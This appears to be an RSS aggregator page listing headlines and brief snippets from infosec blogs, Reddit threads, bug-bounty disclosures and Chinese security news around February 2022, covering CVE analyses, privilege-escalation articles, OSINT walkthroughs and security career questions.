    提示:本系列笔记全部存在于 Github, 可以直接在 Github 查看全部笔记 企业级最流行的私有代码仓库是 Gitlab, 一开始我也打算部署 Gitlab作为私有代码仓库。 但部署完成后发现, Gitlab 资源占用太大了。优化之后也要占用 3g 内存,最后只好放弃这一方案。 随后发现了 G  ( 2 min )
    微服务从代码到k8s部署应有尽有系列(四、用户中心) - 万俊峰Kevin
    我们用一个系列来讲解从需求到上线、从代码到k8s部署、从日志到监控等各个方面的微服务完整实践,整个项目使用了go-zero开发,基本包含了go-zero以及go-zero作者开发的一些中间件,所用到的技术栈基本是go-zero的自研组件。  ( 1 min )
    四探循环依赖 → 当循环依赖遇上 BeanPostProcessor,爱情可能就产生了! - 青石路
    开心一刻 那天知道她结婚了,我整整一个晚上没睡觉,开了三百公里的车来到她家楼下,缓缓的抽了一支烟...... 天渐渐凉了,响起了鞭炮声,迎亲车队到了,那天披着婚纱的她很美,真的很美! 我跟着迎亲车队开了几公里的时候,收到了她的信息:别送了,别送了,你的手扶拖拉机太响了 ...... 前情回顾 楼主一  ( 1 min )
  • Open

    How To Integrate or Query My Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed In Your Firewall or Security Solution - An Analysis
    Dear blog readers, Did you already pull my public and free STIX STIX2 TAXII threat intelligence feed using your and your organization's Lifetime API Key? In this post I've decided to elaborate more and offer practical advice and links in terms of how you can pull and integrate my daily updated STIX STIX2 TAXII threat intelligence feed in your firewall or security solution and how you can actually use your Lifetime API Key for my feed in Maltego for possible enrichment of your IoCs (Indicators of Compromise). Here's your Lifetime API Key for you and your organization - f8aa0cca-a0ac-4eff-9c03-1c86ad7aee93 Portal: https://ddanchev.ngrok.io API: https://ddanchev.ngrok.io/graphql API Documentation: https://luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef059d6d59 API Client: https://opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pycti.html API requirements: https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sample TAXII Collection: https://ddanchev.ngrok.io/taxii2/root/collections/c2259b20-9c60-4ddd-8931-8de970440f06/objects Bearer Token Authentication Required: https://github.com/OpenCTI-Platform/opencti/issues/1198 Maltego transforms available: - https://www.maltego.com/downloads/ - https://www.maltego.com/transform-hub/opencti/ - https://www.maltego.com/transform-hub/stix/ As always feel free to drop me a line at dancho.danchev@hush.com in case you have any questions. Full list of solutions compatible with STIX STIX2 and TAXII EventLog Analyzer ThreatConnect Azure Sentinel Splunk Cisco Elemendar Cortex XSOAR TrendMicro ArcSight Microsoft Sentinel EventTracker Plixer Scrutinizer Sumo Logic Kaspersky CyberTrace ServiceNow CheckPoint ThreatCloud Carbon Black EDR Cisco Email Gateway ThreatConnect LogPoint Tanium Symantec LogRhythm Infoblox Cloudera Sample screenshots of my STIX STIX2 TAXII Threat Intelligence feed in combination with Maltego: Enjoy!

  • Open

    Inventing Anna, engenharia social e OSINT, qual o prospecto para o futuro no quesito de segurança…
    O quanto de informação pessoal e íntima divulgamos nas mídias sociais de forma espontânea e despreocupada? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    Running Cobalt Strike BOFs from Python
    submitted by /u/naksyn_ [link] [comments]
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send a Email to me and get kicked out of Google Groups !!
    A Feature that almost broke Google Groups !! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in a life looks like as a infosec analyst. also what would company’s look for when hiring a junior infosec analyst
    what would a company look for when hiring junior infosec analysts? i just started as a junior help desk technician and i hear that experience is better than certs i just want to get an idea of what a company will look for when hiring a junior infosec analyst also is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Anybody by some chance has some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse-engineering and binary exploitation and I came across this playlist, Watched a few videos but didn't got a thing, it feels like I'm missing some knowledge gaps in between, Can someone please give me a clear roadmap so that I can start using Radare2? ​ Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC
    I have recently interviewed for an entry-level SOC role, and my expectation is a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO. And around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned Analysis of security incidents Incident Response Teams Threat Hunting Security advice During the interview, they asked me two times specifically how I felt about giving security advice to customers, is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    擅长捉弄的内存马同学:Servlet内存马
    Servlet内存马的最后一篇,直接从加载开始说起。  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." im in too deep this forensic thingy is kinda exciting and im in a business major. I guess one can really recover deleted telegram chats using cellebrite! amazing submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data are included in apple icloud productions ? do they include permanently deleted files notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    jump from IT Audit into computer forensics
    hello friends to make things short, I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit. but its very essential to deal with people there. so decided to jump to forensics, do you people deal with humans or simply have to worry about machines and that is it? and, i am cisa certified, will that help? what certification do you suggest taking for computer forensics? and how is the pay for IT Audit vs Computer forensics? in short, do you recommend the shift or not? thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    [Cullinan #27] Improve cullinan and Added more..
    컬리넌 로그 #27입니다. 조금 오랜만에 올리게되는 것 같습니다. Add category cullinan Add OWASP ZAP Add Insecure Deserialization Change SQLMap (Add scanning to X) ZAP과 Insecure Deserialization이 새로 추가됬고, SQLMap 쪽에 일부 수정이 있었습니다. ZAP은 아마… 수정을 굉장히 자주하게 될 것 같습니다. 양이 워낙 방대해서리 😵‍💫 그리고 Cullinan 전체적으로 기능들을 좀 더 추가중인데, 첫 단추로 categories 적용이 완료되었습니다. 그럼 이만 👋🏼
    Insecure Deserialization
    🔍 Introduction Insecure Deserialization은 직역한 그대로 안전하지 않은 역직렬화를 의미합니다. Deserialization 시 개발자가 의도하지 않은 Object 까지 Deserialize하여 비즈니스 로직상의 문제를 발생시키거나, 조건에 따라서는 어플리케이션이 공격자가 의도한 코드를 수행하게끔 구성할 수 있어 리스크가 높습니다. 먼저 Serialization/Deserialization 을 알아보면 보통 개발 과정에서 메모리에 있는 Object를 파일 등 외부의 데이터로 변환하는 과정을 Serialization, 반대로 파일 등 외부에 있는 데이터를 프로그램 내 Object로 변환하는 과정을 Deserialization이라고 합니다. 🗡 Offensive techniques Detect Deserialization은 소스코드를 보지 않은 상태에선 명확하게 Deserialization 프로세스라고 확신하기 어렵습니다.
    OWASP ZAP
    Introduction ZAP(Zed Attack Proxy)은 OWASP의 Flagship 프로젝트로 Vulnerability Assessment, Penetration Testing, Runtime Testing, Code Review를 위한 보안 테스팅 도구이자 취약점 스캐너입니다. Burpsuite와 함께 보안 엔지니어, 버그바운티헌터 등의 주력 도구로 사용되고 있고, Cli command, REST API 그리고 Jenkins plugin, Github action 등을 제공하고 있어 DevSecOps 즉 CI/CD Pipeline 상에서의 DAST 스캐너로도 많이 사용되고 있습니다. 개인적으로 정말 좋아하는 프로젝트입니다. 다른건 몰라도 Fuzzer / Scripting은 비교할 수 있는 도구가 없습니다. 최고에요! Installation 아래 URL에서 각 OS 맞는 Installer 패키지를 통해 설치하시면 됩니다.
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
    Missing $UsnJrnl
    Hi guys what can be the reason to not have a $UsnJrnl on an NTFS filesystem? submitted by /u/Donato_Francesco [link] [comments]  ( 1 min )
  • Open

    Le guide ultime pour améliorer ses recherches concurrentielles sur Google
    Vous souhaitez améliorer vos requêtes lors d’une recherche sur votre concurrent ou sur votre marché ? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, Typosquatting domains, attack domains, and brand impersonate. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what is the source of this? I tried to look into my event viewer without success. submitted by /u/ak_z [link] [comments]  ( 1 min )
    Small matter: A Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing. I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992 [link] [comments]  ( 1 min )
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework should I pick up first, Can you help? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Soc 2 report
    Why SOC 2 report are made by CPA ? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountant? submitted by /u/Xctzn [link] [comments]  ( 2 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    SecWiki News 2022-02-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »  ( 3 min )
    Attacktive Directory — THM
    Attacktive Directory is a box hosted on Try Hack Me. This is medium rated box, but great for any new Red Team Member or penetration… Continue reading on Medium »  ( 2 min )
  • Open

    Directory Traversal — what is it?
    Local File inclusion Continue reading on System Weakness »  ( 3 min )
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB ÇÖZÜMLERİ
    Bir web uygulamasında kullanılan veriler dış bir kaynak aracılığıyla alınıyorsa ve saldırgan web sunucusunun göndermiş olduğu istek… Continue reading on Medium »  ( 7 min )
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
  • Open

    pictures of people playing motorcycle soccer
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
  • Open

    Lazarus 组织开始使用 lolbin 技术
    研究人员发现了 Lazarus 的新攻击行动,利用国防部门的就业岗位信息进行诱饵钓鱼。
  • Open

    Expat library: libexpat 2.4.5 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_5/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30393397 Points: 1 # Comments: 0  ( 21 min )

  • Open

    Microsoft Brings eBPF to Windows unlocking security and networking use cases
    submitted by /u/markcartertm [link] [comments]  ( 1 min )
    Personnel Security, Separation of Duties, Least Privilege, Need to Know, Vendor, Consultant and Contractor Controls, Security Governance, Risk Management
    submitted by /u/Tradition_Wonderful [link] [comments]
    Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    AWS GuardDuty Exfiltration Bypass with VPC Endpoints
    submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
    Extensis Portfolio - Remote Code Execution Vulnerability Disclosure
    submitted by /u/hashput1n [link] [comments]
  • Open

    What is it like to work a computer forensics job?
    How is working for a computer forensics job like? Is it easy as simple as just plugging a hard drive or phone or anything that needs data recovery to retrieve data back or is it much harder and more work? Just wondering because i am a computer science major currently a freshman I might want to do computer forensics because it interests me. submitted by /u/Ill-Date-1852 [link] [comments]  ( 2 min )
    Where do deleted browser history go to?
    I know when u delete something, it never really gets deleted. So just curious, where does cleared browsing history for chrome/safari go to? and are we able to retrieve it? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    How do you really get into incident response
    I have recently graduated from college with a Bachelors in df but the school I went to really was more geared towards what police officers deal with (like criminal activity and all). How should I really go about learning more of the incident response side of forensics? Any good references to YouTube channels, textbooks, websites, etc is much appreciated! submitted by /u/JunketThat2134 [link] [comments]  ( 5 min )
  • Open

    eCPTX Exam Review
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on The Mayor »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Dev Genius »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Medium »
  • Open

    Is it possible to bulk download?
    So there's an album I'm wanting to download from an OD (Queen's complete Platinum Collection which includes over 200 mins of music) and I'm wanting to know if there is a way to go and bulk download all the files without having to press a link, right click, and click "Save audio as..." every time. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    Software (Not Tested)
    https://fichiers.meca.polymtl.ca/?hidden submitted by /u/CalmWater8439 [link] [comments]
    Quake 3 Arena/OpenArena maps and other goodies
    submitted by /u/SpaceOtterMafia [link] [comments]  ( 1 min )
    Best way to limit results by language?
    Greetings! I am currently new to the ussage of open directories and have been wondering how to limit my results for a movie for example to only my language. I am useing the "all resourves i know" guide to construct my searches. Example: intext:"Search Term" intitle:"index.of" +(wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) The Guide: https://www.reddit.com/r/opendirectories/comments/933pzm/all_resources_i_know_related_to_open_directories/ submitted by /u/TwinkleTheToothFairy [link] [comments]  ( 1 min )
  • Open

    Severe Vulnerability Fixed in UpdraftPlus 1.22.3
    Article URL: https://jetpack.com/2022/02/17/severe-vulnerability-fixed-in-updraftplus-1-22-3/ Comments URL: https://news.ycombinator.com/item?id=30391454 Points: 1 # Comments: 1  ( 4 min )
    Local root vulnerability in snap-confine
    Article URL: https://lwn.net/Articles/885195/ Comments URL: https://news.ycombinator.com/item?id=30381169 Points: 2 # Comments: 0  ( 10 min )
  • Open

    Hacking the marketplace
    Guys! This room it’s great and I had a lot of fun, with this room you can learn this: Continue reading on System Weakness »  ( 2 min )
    Recon and YouTube, is that a thing?
    Hey fella hunters, hope you all are doing fine. This is my first ever blog, I will try to keep it as much simple as possible spilling as… Continue reading on Medium »  ( 4 min )
    How i was able To hack Cambridge University ( Arabic )
    السلام عليكم معاكم اخوكم ناصر , بسبب دعمكم السابق لي قررت اكتب هذي المقالة Continue reading on Medium »  ( 1 min )
    Bug Zero is Going to Pay Your Security Bill for 2022
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 2 min )
    Bug Bounties in Sri Lanka
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 5 min )
    Cardano Foundation Doubles Reward Offered to Hackers for Uncovering Bugs on Its Blockchain
    Continue reading on Medium »  ( 2 min )
    Вынікі аўдыта бяспекі Firefly
    Арыгінал:https://firefly.exchange/blog/results-from-firefly-security-audits Continue reading on Medium »  ( 2 min )
    I’ve made over $588k on Bug Bounty so far
    How much one can earn on Bug Bounty? Continue reading on Medium »  ( 1 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 2 min )
    Starswap’s Second Bug Bounty Program
    Starswap is already live on Starcoin’s test network, barnard, as the first step in realizing our ambitious vision of a fully functional… Continue reading on Medium »  ( 1 min )
  • Open

    Android
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1343528 - Bounty: $3000
  • Open

    Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign
    One of the more common infections that we see are site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins. If you’ve ever been redirected to a page that looks something like this, then you’ve fallen victim to such an attack: Once the user clicks through the verification process they are sent to a fake CAPTCHA page asking the user to click to prove they are a human: As we have reported in the past on this type of infection: The goal is to trick visitors into clicking “Allow” when the site asks to subscribe to push notifications. Continue reading Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign at Sucuri Blog.
  • Open

    Free cybersecurity frameworks to try?
    I am just looking around to see if there are any more frameworks I can use to harden our systems. I have already been using the STIG and CIS tools and are about 85% compliant on both. Are there any more free resources I can use to scan against our machines to see if there is anything else I can do to harden them? Thanks submitted by /u/KillingRyuk [link] [comments]  ( 2 min )
    I believe my files were stolen whilst connected to a hacker's personal network, but something doesn't add up. [NSFW]
    So, a friend of mine is in Cybersecurity. I study Cybersecurity and am less advanced in my journey than he is. He's very much into fraud, malware, spyware, etc. So, a few background things - I have anorexia nervosa. He knows this. We have been friends for over 3 years now. We are friends with benefits. We are both meth addicts and I'm heavily dependant on weed. I have an album on my phone containing all my bodychecks. It is stored in the main SD card directory. I have a Samsung Galaxy S20 5G, running Android 11. So one day, he invited me over to record a sex tape. Okay, whatever. So I went to his house, ended up sucking his dick, he finishes. We chat for a bit, I'm in his loungeroom on his couch for a an hour or so. At one point early on I mention that I am downloading a large file onto my phone. He asks if I want to use his Wi-Fi, and I accept. When I'm connecting, he convinces me to use my phone MAC address. Okay. I try to browse the Internet while I wait but the connection is garbage. I recieve a text from our other friend who wants to buy weed off me. He immediately ushers me out the door despite suggestions of a Round 2 earlier. Later that night, I notice that when posting to my Instagram, all the recent photos are my bodychecks. Despite me not having touched that folder at all in the past six months. All the photos are there, twice - in my recent photos and where they originally were. I cannot find any duplicate albums on my phone that would cause this. This all happened last week, but the files were modified again last night. Should I be worried? submitted by /u/856850835 [link] [comments]
    Security Metrics
    So I'm working on a security project now and we have a bunch of issues that need fixing over a number of areas and I need a way of prioritising these items and showing that the security of the system is improving. Normally you would use CVSS to calculate this however this program won't be dealing with just vulnerabilities in the product but also in operations and governance. How do you prioritise updating a library in your product with an RCE against a GDPR issue or an internal tool with weak password policies? Also how do you score the system overall to show that fixing these issues has improved the overall security posture? submitted by /u/dbxp [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-18 Review
    利用IP分片污染攻击TCP流量 by ourren “红蓝对抗演练评分系统”开源框架 (preview) by ourren Web框架CSRF防御的有效性 by ourren PRIVGUARD:用于GDPR隐私合规的数据治理框架 by ourren 中间商之 Ntlm Relay 攻击分析 by ourren 网络安全工作你必须懂的"3保1评" by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-18 Review
    利用IP分片污染攻击TCP流量 by ourren “红蓝对抗演练评分系统”开源框架 (preview) by ourren Web框架CSRF防御的有效性 by ourren PRIVGUARD:用于GDPR隐私合规的数据治理框架 by ourren 中间商之 Ntlm Relay 攻击分析 by ourren 网络安全工作你必须懂的"3保1评" by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 1 min )
    Tattoos for Buildings — OSINT Challenge 17
    On Jan 24, 2022, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »  ( 2 min )
    OSINT: How extract text From an Image or Video
    Did every wonder what a piece of foreign text means on a sign, banner, or in a video. Sure you can type it into google translate or speak… Continue reading on Medium »  ( 2 min )
  • Open

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more. READ MORE  ( 7 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    FreeBuf早报 | Meta因隐私案赔付九千万美元;谷歌推新隐私保护政策
    Facebook 母公司 Meta 同意支付 9000 万美元,以了结一场十年前的诉讼案件。  ( 1 min )
    一种基于Golang的僵尸网络正在成为新的威胁
    近日,网络安全研究人员破解了一种名为Kraken的新型僵尸网络。该僵尸网络是基于Golang语言开发的,黑客们正在积极对它进行优化升级。
    谷歌宣布将在安卓系统内引入“隐私沙盒”
    谷歌周三宣布,计划将隐私沙盒引入安卓系统,以期将既注重隐私、又不会对用户造成干扰的广告技术扩展到移动网络。
    勒索软件猖獗,2021 年检测到 6.23 亿次
    物联网恶意软件、加密威胁和加密劫持等都保持了全年的高速增长。  ( 1 min )
    FreeBuf周报 | 国际互联网协会数据泄露;乌克兰遭大规模DDoS攻击
    乌克兰国家安全机构(SSU)宣称,此次针对乌克兰的网络攻击,是有预谋,有组织、背后有庞大“黑手”的具体行动。  ( 1 min )
    黑客潜入Microsoft Teams发送恶意软件
    黑客利用Microsoft Teams,并在聊天里传播恶意可执行文件。
    百密一疏,透明部落与SideCopy共用基础设施露出马脚
    Quick Heal披露了一起针对印度国防军和武装部队陆军人员的窃密行动并将其命名为Operation SideCopy。
    FreeBuf甲方群话题讨论 | 聊聊企业安全运营中的个人数据隐私
    作为企业的安全部门,确保企业安全稳定运作的同时,如何保护平台数据时代下每个“透明人”的隐私数据安全?
    巨头让步!Meta 将支付 9000 万美元
    案件指控 meta 使用 cookies 追踪已退出账号的 Facebook 用户。  ( 1 min )
    你的跳蛋,黑客们表示很感兴趣
    跳蛋、按摩棒是你深夜的好伙伴,它们可能也在偷偷泄露着你的使用数据。  ( 1 min )
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Watch "C0V3RT - "Just For Fun" Challenge Lock (Picked & Gutted)" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
  • Open

    Internals of Go's new fuzzing system
    Article URL: https://jayconrod.com/posts/123/internals-of-go-s-new-fuzzing-system Comments URL: https://news.ycombinator.com/item?id=30380994 Points: 2 # Comments: 0  ( 6 min )

  • Open

    Would you support brain forensics (mind reading)
    Poll View Poll submitted by /u/themariocrafter [link] [comments]  ( 1 min )
    Who is running sysmon on workstations and forwarding to SIEM?
    Hi Just wondering if any enterprise size companies are running sysmon on workstation and/or servers and forwarding the event to some sort of logger/SIEM? What are the pros and cons? submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    PDF Analysis for adult content
    I have a PDF that consists of ~27,000 pages and >42,000 images (it's a Cellebrite extraction report from an iPhone). I need to know how many of the images are "adult" in nature. I know Google (https://cloud.google.com/vision/docs/detecting-safe-search) and Microsoft (https://docs.microsoft.com/en-us/azure/cognitive-services/computer-vision/concept-detecting-adult-content) both have "A.I." based image filtering API's that can automatically scan images and find adult/gore/explicit images, but I'm not aware of any software that leverages these technologies (or something similar). What I'm looking for: 1. The best way to dump this many images from a PDF file, and 2. The best way to scan that dump for explicit images (or a way to just scan the PDF file directly and skip dumping the images). submitted by /u/agrowland [link] [comments]  ( 3 min )
  • Open

    How to track vehicles using Open Souce Imagery
    Vehicle information can be fantastic tool for investigators to scrutinize and track a real world target, but what OSINT opportunities can… Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 3 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Solving Dojo’s geolocation quiz
    One day, when I was surfing the internet, my twitter push me a tweet, lets see what does the tweet write: Continue reading on Medium »  ( 2 min )
    OSINT Tool - CarNet.ai
    The best tool to (correctly!) identify a vehicle’s brand and model using AI. Continue reading on Medium »  ( 2 min )
  • Open

    Why should you not send sensitive data over email
